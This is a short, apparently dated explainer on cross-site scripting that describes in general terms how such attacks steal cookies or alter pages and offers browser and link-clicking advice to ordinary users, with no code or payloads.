What is XSS?

XSS is an abbreviation for Cross Site Scripting. This refers to a type of computer security vulnerability where malicious users can add carefully-constructed comments to webpages with the intention of fooling web browsers. While most websites have filters to determine when a post containing XSS code is made, it is near impossible to filter all the different types of attacks possible. Thus, almost any website that allows users to post comments is susceptible to Cross Site Scripting attacks.

While Cross Site Scripting exploits are often done for the naive fun of creating JavaScript popups on popular webpages such as news articles, XSS attacks can also be vectors in more serious attacks such as phishing. Commonly, cookie information is stolen via XSS. This allows attackers access to users accounts on websites under attack. Additionally, attackers can change webpages to link to malicious web sites that appear to be legitimate, add advertising to webpages, change user settings, and more. Every week between 3 and 5 new Cross Site Scripting exploits are discovered, each using a different method and affecting the victim in a different way. All major websites including Yahoo, Paypal, Ebay, CNN, Microsoft, and even FBI.com have been subject to successful XSS attacks. As Cross Site Scripting is not dependent upon unencrypted connections, secure websites (those that display a lock icon in the browser) are as vulnerable to XSS as any other website.

To avoid falling victim to Cross Site Scripting attacks, different strategies must be taken. Always make sure that you are using a secure web browser. While web browsers such as Firefox and Opera are deemed relatively secure from attacks that attack your operating system, they are not 100% safe from XSS attacks that rely upon malformed HTML. Browsers such as Internet Explorer are known as being overly vulnerable, and expose the operating system to intrusion. Also, never follow a URL from an email, even from people that you trust. Always type the address of the website you intend to visit from the address bar of your web browser. If you do notice that a link that you click opens the webpage in Internet Explorer instead of Firefox, close the window immediately and change your password to the site you just visited. Attackers try to force links to open in Internet Explorer to take advantage of its weaknesses.